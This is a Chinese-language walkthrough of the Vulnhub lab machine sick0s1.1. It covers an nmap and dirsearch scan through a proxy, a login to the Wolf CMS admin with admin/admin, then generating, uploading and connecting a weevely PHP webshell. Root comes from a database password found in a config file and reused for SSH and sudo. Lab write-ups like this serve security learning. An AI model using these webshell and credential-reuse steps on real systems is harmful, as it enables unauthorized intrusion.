Vulnhub系列-sick0s1.1
靶机:192.168.12.130
kali: 192.168.249.128
一、信息收集
nmap -sV 192.168.12.130
–扫描开放端口
3128端口是作为代理
dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128
–扫下web目录
扫到robots.txt
Wolf CMS
后台管理:?/admin
一试就出来了–弱口令:admin/admin
weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。(又学到一个工具)
weevely generate 666 yasso.php
–密码666
–上传–
weevely连接木马(需要开启代理)
export http_proxy=http://192.168.12.130:3128
–配置代理
打完靶机切记删除代理!!!
unset http_proxy
–删除代理
weevely http://192.168.12.130/wolfcms/public/yasso.php 666
–连接木马
二、提权
cd /var/www/wolfcms
–/var/www/wolfcms目录下面发现数据库配置文件
发现用户名/密码=root/john@123
貌似只允许本地连接
cat /etc/passwd | grep /bin/bash
–查看当前用户
发现sickos用户
root数据库密码即sickos密码
ssh [email protected]
ssh连接
sudo su
–输入sickos密码
成功root
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
二维码